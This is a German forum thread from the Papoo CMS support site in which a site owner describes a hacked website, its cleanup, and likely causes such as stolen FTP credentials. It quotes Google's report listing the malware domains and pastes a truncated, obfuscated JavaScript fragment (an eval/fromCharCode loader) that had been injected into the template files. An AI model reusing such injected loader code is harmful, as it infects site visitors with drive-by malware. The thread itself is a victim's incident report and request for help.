Support Telefon: 0228 / 280 56 68 - Mo-Fr. 09-18.00
Support
Forum Hilfe
Webiste "gehackt", Vorgehen beim Wiederherstellen?
Hallo,
eine unserer Webseiten (Papoo 3.5.0) wurde anscheinend "gehackt".
Der Zugriff mit Firefox und IE ist nicht mehr möglich, auch ins Backend komme ich nicht.
Der IE 8 meldet keinen Fehler, lädt die Seite allerdings auch nicht fertig.
Beim Versuch, mal nachzusehen, was da los ist, kriege ich unterschiedliche Infos, je nach Browser.
Firefox meldet "wurde als attackierende Seite gemeldet und auf Grund Ihrer Sicherheitseinstellungen blockiert."
Klicke ich auf "Warum wurde diese Seite blockiert" bekomme ich das Ergebnis "Welche Befunde hat Google beim Besuch dieser Website festgestellt?
Bei 2 Seite(n) von insgesamt 3 Seiten dieser Website, die wir in den letzten 90 Tagen getestet haben, wurde festgestellt, dass Malware (Schadsoftware) ohne Einwilligung des Nutzers heruntergeladen und installiert wurde. Der letzte Besuch von Google auf dieser Website war am 2010-10-26 und verdächtiger Content wurde auf dieser Website zuletzt am 2010-10-26 gefunden.
Malicious software includes 1 exploit(s). Successful infection resulted in an average of 4 new process(es) on the target machine.
Die Malware wird in 2 Domain(s) gehostet, darunter izraijaa.com/, nuzno.us/.
Bei der Verteilung von Malware an Besucher dieser Website fungieren anscheinend 1 Domain(s) als Überträger, darunter flliminotti.com/."
Bei IE wird die Seite garnicht geladen. Gehe ich dort in den Quelltext wird ab Zeile 91 anscheinend ein Script eingebunden, der etwa so aussieht: html><body><script>win=window;gar=win['String'];ga='l';g=win['eva'+ga];sf=gar.fromCharCode;g(sf(4.5*2,52.5*2,51*2,16*2,20*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,51.5*2,50.5*2,58*2,34.5*2,54*2,50.5*2,54.5*2,50.5*2,55*2,58*2,57.5*2,33*2,60.5*2,42*2,48.5*2,51.5*2,39*2,48.5*2,54.5*2,50.5*2,20*2,19.5*2,49*2,55.5*2,50*2,60.5*2,19.5*2,20.5*2,...
Hat jemand Erfahrung mit diesem Verhalten?
Wie kann ich beim Wiederherstellen vorgehen?
Die Seite lief seit ca. 3,5 Jahren problemlos.
Ich bin für jeden Hinweis dankbar.
Gruß 
Stefan
Re: Webiste "gehackt", Vorgehen beim Wiederherstellen?
Hallo Carsten,
vielen Dank für die Tipps, die Seite ist wieder gesäubert.
Der Script war in den templates untergebracht, jeweils in der Datei "index.html"
Das war zum Glück einfach zu finden, das das Änderungsdatum nicht mit dem der anderen Daetein übereinstimmte.
Ich habe trotzdem zur Vorsicht ein kompettes Backup einschliesslich des Sicherheitspatchs eingespielt.
Interessanterweise wurde vorgestern eine weitere Seite (Papoo 3.7.5 light) auf die gleiche Weise "optimiert"
Die zu säubern war dann nicht mehr schwer...
Ausschliessen möchte ich mal als Ursache ein unsicheres FTP-Password, dass erraten wurde: das Kennwort bestand bei der ersten Seite aus 14 bunt gemischten Zeichen, wie in eurem Blog-Eintrag.
Der letzte FTP-Zugriff auf die erste Seite fand im Juli statt (Sicherung der Datenbankbackups), bei der zweiten Seite im Oktober.
Meinen Rechner habe ich mit drei Virenscannern komplett abgesucht, nichts gefunden. Allerdings hatte ich vor ca. 2 Monaten einen Trojaner.
Als FTP-Programm nutze ich Filezilla. Vielleicht liegt dort der Haken: die Serverzugänge liegen im Klartext in einer xml-Datei, wer die in die Finger kriegt, braucht sie nur zu öffnen.
Zweiter Knackpunkt: da ich kein SFTP eingestellt habe, besteht die Möglichkeit, dass ein Sniffer die Login-Dateien mitgeschnitten hat.
Klar stelle ich jetzt auf SFTP um.
Gruß
Stefan
Re: Webiste "gehackt", Vorgehen beim Wiederherstellen?
Hallo Carsten,
der Zugriff war am 01.11.10 kurz vor 23 Uhr.
Gruß
Stefan
Sie müssen sich anmelden, um einen Beitrag schreiben zu können.
Die Papoo Versionen
Papoo aufrüsten
Zur Web CMS| CMS Software Startseite
Web Content Management System - Web CMS Papoo
Mit Papoo einfach die eigene Webseite managen...
Modeschmuck mit Papoo Shop?
Eine der schönsten Umsetzungen mit unserem neuen Onlineshop Modul... klicken Sie hier: Modeschmuck Ketten.Schmuck Ketten.
Finden Sie uns auf Facebook
Newsletter bestellen
Bestellen Sie hier unseren Online Newsletter und bleiben Sie immer Uptodate!
Sie haben Fragen?
Dann rufen Sie uns an
(0228 / 280 56 68) oder schreiben Sie uns!
Datenschutz
Infos zum Datenschutz
Die letzten Einträge im Forum
- test 2012-05-22 08:29:42 .
- Artikelanzeige nebeneinader? 2009-10-08 14:05:52 .
- Bildergalerie und Kategorie 2012-05-19 13:08:22 .
- Teaser Probleme 2012-05-18 14:27:31 .
- Galerie anzeige Thumbs 2012-05-17 13:56:22 .
Papoo ist das richtige
Die Online Demo
Hier finden Sie die Online Demo von Papoo - testen Sie alle Features die Sie gerne hätten.
Screenshots Papoo Admin
Schauen Sie sich einmal die Admin an - so managed man Webseiten...Admin Screenshots.
Agentur in Ihrer Region
Finden Sie Ihren Ansprechpartner für Ihre Umsetzung in Ihrer Region - unsere zertifizierten Partner beraten Sie und setzen für Sie Ihre Webseite um. Unsere zertifizierten Partner finden Sie hier...
Unsere Leistungen
Was wir für die tun können? Eine Menge: Installation, Designumsetzungen, Programmierung uvm. – hier erfahren Sie mehr...
Hosting für Papoo
Sie wollen wissen, welcher der beste Provider für Ihre Internetseite ist? Dann klicken Sie hier: Bester Provider für Papoo
© PAPOO Software & Media seit 2003. Alle Rechte vorbehalten. Papoo CMS - ein Produkt von Papoo-Media | Webdesign Bonn | Internetagentur Bonn und Umgebung